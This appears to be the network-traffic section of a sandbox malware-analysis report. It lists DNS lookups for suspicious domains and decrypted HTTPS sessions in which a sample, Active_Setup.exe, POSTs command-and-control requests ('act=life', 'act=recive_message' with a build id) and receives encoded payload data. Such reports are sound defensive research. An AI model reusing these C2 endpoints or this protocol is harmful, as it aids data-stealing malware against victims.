                                                                                                                                                Dec 30, 2024 18:19:21.004091978 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:22.172971010 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:22.173051119 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:22.173099041 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:22.173260927 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:22.173283100 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:22.704474926 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:22.704531908 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:22.704621077 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:22.704900980 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:22.704912901 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.166479111 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.166549921 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.168551922 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.168560028 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.169078112 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.193703890 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.194458961 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.194515944 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.194623947 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.194680929 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.194792032 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.194971085 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.195091963 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195115089 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.195403099 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195429087 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.195564032 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195596933 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195648909 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.195792913 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195827961 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.195883989 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.196022987 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.196053982 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.196070910 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.203993082 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.204157114 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.204195976 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.204257965 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.204669952 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:23.204687119 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:23.210808992 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:24.803970098 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:24.804068089 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:24.804121971 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:24.804316998 CET49743443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:24.804337025 CET44349743188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:24.813457966 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:24.813505888 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:24.813574076 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:24.813823938 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:24.813834906 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.274991989 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.275089979 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.276478052 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.276489019 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.276691914 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.312733889 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.312752008 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.312963009 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.778753042 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.778865099 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.779069901 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.779320955 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.779340982 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.779354095 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:25.779359102 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.889342070 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:25.889388084 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.889467001 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:25.889802933 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:25.889815092 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.632827997 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.632900953 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.636962891 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.636972904 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.637183905 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.638493061 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.679333925 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.904964924 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.905035019 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.905095100 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.906605005 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.906625986 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.906637907 CET49745443192.168.2.4185.161.251.21
                                                                                                                                                Dec 30, 2024 18:19:26.906644106 CET44349745185.161.251.21192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.943183899 CET49746443192.168.2.4104.21.37.128
                                                                                                                                                Dec 30, 2024 18:19:26.943252087 CET44349746104.21.37.128192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.943346977 CET49746443192.168.2.4104.21.37.128
                                                                                                                                                Dec 30, 2024 18:19:26.943593979 CET49746443192.168.2.4104.21.37.128
                                                                                                                                                Dec 30, 2024 18:19:26.943627119 CET44349746104.21.37.128192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:27.076690912 CET49746443192.168.2.4104.21.37.128

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 30, 2024 18:19:11.092152119 CET6316053192.168.2.41.1.1.1
                                                                                                                                                Dec 30, 2024 18:19:11.104726076 CET53631601.1.1.1192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:25.781056881 CET6181753192.168.2.41.1.1.1
                                                                                                                                                Dec 30, 2024 18:19:25.888334990 CET53618171.1.1.1192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:26.928519011 CET5063753192.168.2.41.1.1.1
                                                                                                                                                Dec 30, 2024 18:19:26.942470074 CET53506371.1.1.1192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:28.127329111 CET5782253192.168.2.41.1.1.1
                                                                                                                                                Dec 30, 2024 18:19:28.136518955 CET53578221.1.1.1192.168.2.4

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Dec 30, 2024 18:19:11.092152119 CET192.168.2.41.1.1.10x396bStandard query (0)cryofficesj.clickA (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:19:25.781056881 CET192.168.2.41.1.1.10x4a74Standard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:19:26.928519011 CET192.168.2.41.1.1.10x65bfStandard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:19:28.127329111 CET192.168.2.41.1.1.10xd268Standard query (0)dfgh.onlineA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Dec 30, 2024 18:19:11.104726076 CET1.1.1.1192.168.2.40x396bNo error (0)cryofficesj.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:19:11.104726076 CET1.1.1.1192.168.2.40x396bNo error (0)cryofficesj.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:19:25.888334990 CET1.1.1.1192.168.2.40x4a74No error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:19:26.942470074 CET1.1.1.1192.168.2.40x65bfNo error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:19:26.942470074 CET1.1.1.1192.168.2.40x65bfNo error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:19:28.136518955 CET1.1.1.1192.168.2.40xd268Name error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • cryofficesj.click
                                                                                                                                                • cegu.shop

                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.449730188.114.97.34437532C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:19:11 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 8
                                                                                                                                                Host: cryofficesj.click
                                                                                                                                                2024-12-30 17:19:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                Data Ascii: act=life
                                                                                                                                                2024-12-30 17:19:12 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:19:12 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=mfie4mrp7ap1cmm2budbdbut7p; expires=Fri, 25 Apr 2025 11:05:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YUp2UTDDfGXI1FgXEnTeWM3AQYuwZOfAqj%2B4G3A1x%2BtUs6m6m%2BQYx7obvkGjC1T9yafkIhTH%2Beb8fjr7AHkYOdJ%2BMicbsnj8Vkw%2BCrl0JaY9J08qgEOJyEwK8wQQQmqI2HK4ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3b1821e644261-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2281&min_rtt=2247&rtt_var=911&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1158270&cwnd=239&unsent_bytes=0&cid=8c7622a5d5726d24&ts=681&x=0"
                                                                                                                                                2024-12-30 17:19:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                2024-12-30 17:19:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.449731188.114.97.34437532C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:19:12 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 78
                                                                                                                                                Host: cryofficesj.click
                                                                                                                                                2024-12-30 17:19:12 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397
                                                                                                                                                2024-12-30 17:19:13 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:19:13 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=ajj0qms2e65sorg3933vfrp7ch; expires=Fri, 25 Apr 2025 11:05:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nCNO9TwKHHlxn1C%2FkLEGnSPgmHoaWJuZJWVPXVFdoLvRVlYhaLXzMFXL1hVZSr%2F78hgoBWMsu9jbrBzMtDNqtWB8j0j%2FFtBGv2EZIINg5Nt5fI0%2FZ4cGtxr0gl9AMiTPdE1CSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3b1893b4842aa-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2262&min_rtt=2254&rtt_var=862&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=979&delivery_rate=1256454&cwnd=201&unsent_bytes=0&cid=e4562df5842187e1&ts=497&x=0"
                                                                                                                                                2024-12-30 17:19:13 UTC238INData Raw: 63 35 32 0d 0a 44 74 69 4a 30 32 57 55 77 51 37 31 39 79 36 4b 50 4b 51 58 32 2b 76 53 55 39 63 6a 6b 50 53 50 69 65 4c 77 6a 57 63 4d 39 67 70 31 2b 76 2f 78 58 36 44 74 4c 49 61 53 44 4c 42 49 31 6d 4b 2b 78 2f 41 79 73 77 47 71 6b 75 37 6c 6b 5a 57 68 52 58 71 62 4b 44 53 2b 36 4c 38 57 38 65 30 73 6b 49 38 4d 73 47 66 66 4e 62 36 46 38 47 6e 31 52 76 71 57 37 75 57 41 6b 65 59 49 66 4a 70 70 5a 72 54 75 75 77 44 33 70 57 2b 5a 6d 6b 76 76 57 63 56 39 74 59 4b 2f 4f 37 6f 42 76 4e 62 71 38 38 44 4b 72 79 70 70 67 6d 74 44 75 66 71 34 52 2b 6e 74 64 64 65 53 51 4b 67 47 68 6e 61 2b 69 62 34 31 73 30 6a 34 6e 4f 66 74 67 5a 54 6e 46 32 57 51 59 6d 61 36 37 62 6f 4b 2f 72 46 69 6b 35 31 41 36 56 50 46 4e
                                                                                                                                                Data Ascii: c52DtiJ02WUwQ719y6KPKQX2+vSU9cjkPSPieLwjWcM9gp1+v/xX6DtLIaSDLBI1mK+x/AyswGqku7lkZWhRXqbKDS+6L8W8e0skI8MsGffNb6F8Gn1RvqW7uWAkeYIfJppZrTuuwD3pW+ZmkvvWcV9tYK/O7oBvNbq88DKryppgmtDufq4R+ntddeSQKgGhna+ib41s0j4nOftgZTnF2WQYma67boK/rFik51A6VPFN
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 66 66 4a 74 79 6e 31 47 62 4c 46 33 2b 69 52 67 2f 6f 49 66 70 49 6f 63 2f 54 79 38 51 44 36 34 7a 54 58 6e 55 44 6d 57 38 56 36 76 6f 69 77 49 37 70 42 38 5a 37 6c 37 34 71 64 34 41 70 67 6e 6d 39 6b 73 2b 79 2b 41 50 36 6c 59 35 54 56 41 71 68 5a 33 6a 58 68 79 5a 41 68 74 6b 4c 6d 6d 2f 79 72 6e 39 7a 32 52 57 6d 59 4b 44 54 36 37 62 38 47 2b 36 4e 2b 6e 35 35 48 37 55 7a 4e 66 4c 53 45 73 44 79 2f 54 76 47 57 36 75 47 4b 6e 65 55 42 59 35 6c 75 62 4c 71 72 2f 30 66 78 75 79 7a 50 31 57 2f 74 54 73 46 35 72 38 75 4b 63 61 6f 50 36 39 62 71 35 38 44 4b 72 77 31 72 6c 32 74 6e 74 65 69 35 44 4f 53 6a 66 70 47 59 53 66 70 59 77 33 75 7a 69 71 49 37 75 30 66 78 6e 2b 62 69 68 5a 58 72 52 53 44 55 62 33 54 36 73 2f 45 6d 2b 36 68 67 6e 59 4a 4d 71 45 47 49
                                                                                                                                                Data Ascii: ffJtyn1GbLF3+iRg/oIfpIoc/Ty8QD64zTXnUDmW8V6voiwI7pB8Z7l74qd4Apgnm9ks+y+AP6lY5TVAqhZ3jXhyZAhtkLmm/yrn9z2RWmYKDT67b8G+6N+n55H7UzNfLSEsDy/TvGW6uGKneUBY5lubLqr/0fxuyzP1W/tTsF5r8uKcaoP69bq58DKrw1rl2tntei5DOSjfpGYSfpYw3uziqI7u0fxn+bihZXrRSDUb3T6s/Em+6hgnYJMqEGI
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 49 39 76 30 66 39 6d 2b 47 72 7a 74 4c 6f 48 53 37 4d 4b 45 61 35 2f 37 49 4e 74 4a 5a 76 6d 5a 74 4c 2f 68 37 5a 4f 36 44 4a 74 7a 33 31 47 62 4b 62 37 4f 4f 47 67 4f 41 49 62 5a 70 6d 59 37 2f 6b 75 51 66 32 72 6d 6d 54 6e 6b 66 72 55 38 4a 6e 73 34 6d 34 4e 4c 52 4c 2b 4e 61 6a 71 34 65 4b 72 31 30 75 70 58 39 6e 2b 4e 36 79 43 66 69 6b 65 74 65 4b 41 76 45 65 77 58 6e 35 30 66 41 38 76 55 54 33 6d 65 7a 68 6a 70 66 6c 43 57 61 61 61 33 36 31 37 37 45 4c 2f 71 6c 68 6d 5a 46 45 34 56 58 4e 63 37 6d 49 75 6e 48 37 41 66 57 4f 72 62 50 41 70 75 67 4a 59 35 73 71 57 62 6e 6c 76 77 44 67 34 33 50 5a 6a 41 7a 76 55 6f 59 74 2b 59 57 35 4d 62 35 4c 39 70 62 71 35 6f 57 52 36 41 5a 6a 6b 32 4a 69 76 65 2b 39 44 76 75 6c 62 4a 43 52 53 66 70 62 7a 33 6d 31 79
                                                                                                                                                Data Ascii: I9v0f9m+GrztLoHS7MKEa5/7INtJZvmZtL/h7ZO6DJtz31GbKb7OOGgOAIbZpmY7/kuQf2rmmTnkfrU8Jns4m4NLRL+Najq4eKr10upX9n+N6yCfiketeKAvEewXn50fA8vUT3mezhjpflCWaaa36177EL/qlhmZFE4VXNc7mIunH7AfWOrbPApugJY5sqWbnlvwDg43PZjAzvUoYt+YW5Mb5L9pbq5oWR6AZjk2Jive+9DvulbJCRSfpbz3m1y
                                                                                                                                                2024-12-30 17:19:13 UTC185INData Raw: 42 37 64 6a 30 71 34 65 65 72 31 30 75 6e 57 46 2b 74 4f 57 34 43 76 43 72 61 35 6d 59 52 2b 35 56 77 58 4b 2f 68 4c 67 38 73 45 4c 7a 6b 75 66 35 67 35 6e 6c 43 47 54 55 4a 69 79 39 38 2f 46 66 74 6f 52 67 76 6f 56 58 2b 6b 69 47 61 76 65 51 38 44 61 35 41 61 72 57 37 75 53 4a 6e 65 63 4e 59 5a 74 73 59 72 7a 74 76 41 4c 35 71 58 36 66 6d 30 48 6a 55 63 31 6e 75 59 53 30 50 62 46 4a 2b 5a 79 74 70 63 43 56 39 30 55 32 31 46 31 68 74 65 75 79 45 62 61 38 49 6f 37 56 53 2b 51 65 6e 6a 57 31 68 37 41 2b 75 55 33 35 6e 75 7a 6e 6a 70 58 71 44 47 0d 0a
                                                                                                                                                Data Ascii: B7dj0q4eer10unWF+tOW4CvCra5mYR+5VwXK/hLg8sELzkuf5g5nlCGTUJiy98/FftoRgvoVX+kiGaveQ8Da5AarW7uSJnecNYZtsYrztvAL5qX6fm0HjUc1nuYS0PbFJ+ZytpcCV90U21F1hteuyEba8Io7VS+QenjW1h7A+uU35nuznjpXqDG
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 34 33 33 33 0d 0a 61 63 65 6d 32 2b 34 37 41 4a 2b 61 4a 6f 6b 70 42 49 37 31 72 41 65 76 6e 48 38 44 61 74 41 61 72 57 77 73 79 31 30 4d 34 2f 4c 6f 73 6d 64 66 72 73 76 55 65 75 34 32 43 55 6d 55 54 6e 57 4d 39 35 73 34 43 37 50 62 35 46 2f 70 2f 6f 37 59 47 58 36 67 52 71 6d 47 4a 71 75 65 69 2b 43 50 6d 72 4c 4e 6e 56 53 2f 41 65 6e 6a 57 63 6e 72 73 2f 73 77 48 74 32 50 53 72 68 35 36 76 58 53 36 59 59 57 71 38 37 72 30 47 38 4b 74 70 6e 35 46 4e 37 6c 6a 46 65 72 32 4d 73 54 36 78 54 66 79 63 37 4f 71 4d 6d 65 41 4f 61 39 51 6d 4c 4c 33 7a 38 56 2b 32 6b 6d 2b 42 67 6c 7a 6b 48 74 6b 37 6f 4d 6d 33 50 66 55 5a 73 70 66 2f 34 59 71 63 36 67 70 72 6c 32 64 72 74 2b 32 39 44 66 2b 72 61 70 69 63 58 75 74 53 79 48 4b 33 68 62 34 38 76 30 4c 2f 31 71 4f
                                                                                                                                                Data Ascii: 4333acem2+47AJ+aJokpBI71rAevnH8DatAarWwsy10M4/LosmdfrsvUeu42CUmUTnWM95s4C7Pb5F/p/o7YGX6gRqmGJquei+CPmrLNnVS/AenjWcnrs/swHt2PSrh56vXS6YYWq87r0G8Ktpn5FN7ljFer2MsT6xTfyc7OqMmeAOa9QmLL3z8V+2km+BglzkHtk7oMm3PfUZspf/4Yqc6gprl2drt+29Df+rapicXutSyHK3hb48v0L/1qO
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 41 4a 6c 6e 47 4e 6a 76 50 6d 39 43 65 53 6d 66 6f 58 56 41 71 68 5a 33 6a 58 68 79 59 59 32 70 56 48 78 31 4e 7a 39 67 34 54 6b 43 47 4c 55 64 79 4b 6a 71 37 59 4c 74 76 73 73 6b 5a 70 46 36 31 48 48 66 4c 57 45 74 54 69 77 51 50 53 53 35 2b 47 41 6c 4f 6b 45 61 35 35 72 62 62 44 69 74 67 2f 78 6f 48 37 58 32 77 7a 76 52 6f 59 74 2b 61 43 33 49 37 74 52 73 6f 6d 6a 38 73 43 56 34 30 55 32 31 47 78 6d 74 65 2b 32 43 2f 43 6d 61 70 71 55 51 2b 6c 65 79 58 47 79 67 4c 59 77 75 45 54 2f 6b 76 2f 68 69 35 33 6a 44 47 4b 5a 4b 43 4c 36 37 4b 6c 48 72 75 4e 64 6d 70 74 43 37 30 69 47 61 76 65 51 38 44 61 35 41 61 72 57 37 4f 65 50 6b 65 41 47 62 5a 56 69 66 71 6a 6e 75 41 2f 7a 72 32 65 5a 6b 31 37 75 55 63 39 32 75 6f 43 33 4f 62 6c 4c 38 5a 47 74 70 63 43 56
                                                                                                                                                Data Ascii: AJlnGNjvPm9CeSmfoXVAqhZ3jXhyYY2pVHx1Nz9g4TkCGLUdyKjq7YLtvsskZpF61HHfLWEtTiwQPSS5+GAlOkEa55rbbDitg/xoH7X2wzvRoYt+aC3I7tRsomj8sCV40U21Gxmte+2C/CmapqUQ+leyXGygLYwuET/kv/hi53jDGKZKCL67KlHruNdmptC70iGaveQ8Da5AarW7OePkeAGbZVifqjnuA/zr2eZk17uUc92uoC3OblL8ZGtpcCV
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 4e 33 49 71 4f 72 74 67 75 32 2b 79 79 52 6e 45 72 76 57 4d 68 6e 76 49 2b 2f 50 72 78 49 39 70 37 75 36 34 53 57 36 41 42 74 6d 47 4e 72 75 65 53 31 44 76 69 71 59 39 66 62 44 4f 39 47 68 69 33 35 71 4b 73 79 75 55 79 79 69 61 50 79 77 4a 58 6a 52 54 62 55 5a 47 4b 2f 36 37 73 42 38 71 5a 71 6e 5a 42 4d 34 31 33 4a 63 62 2b 4e 76 7a 47 2b 53 50 4f 51 36 4f 47 4c 6c 4f 49 47 61 4a 49 6f 49 76 72 73 71 55 65 75 34 30 79 4d 6d 45 44 76 48 74 6b 37 6f 4d 6d 33 50 66 55 5a 73 70 33 68 37 34 65 53 34 67 5a 6d 6b 57 78 6d 76 2b 75 35 46 66 36 6a 61 34 57 48 54 4f 46 62 79 6e 61 35 6a 62 59 34 73 30 4c 32 31 71 4f 72 68 34 71 76 58 53 36 35 5a 47 75 54 37 4b 70 48 36 65 31 31 31 35 4a 41 71 41 61 47 64 4c 4b 44 76 7a 79 32 52 2f 47 64 36 4f 47 42 6c 65 63 49 66
                                                                                                                                                Data Ascii: N3IqOrtgu2+yyRnErvWMhnvI+/PrxI9p7u64SW6ABtmGNrueS1DviqY9fbDO9Ghi35qKsyuUyyiaPywJXjRTbUZGK/67sB8qZqnZBM413Jcb+NvzG+SPOQ6OGLlOIGaJIoIvrsqUeu40yMmEDvHtk7oMm3PfUZsp3h74eS4gZmkWxmv+u5Ff6ja4WHTOFbyna5jbY4s0L21qOrh4qvXS65ZGuT7KpH6e1115JAqAaGdLKDvzy2R/Gd6OGBlecIf
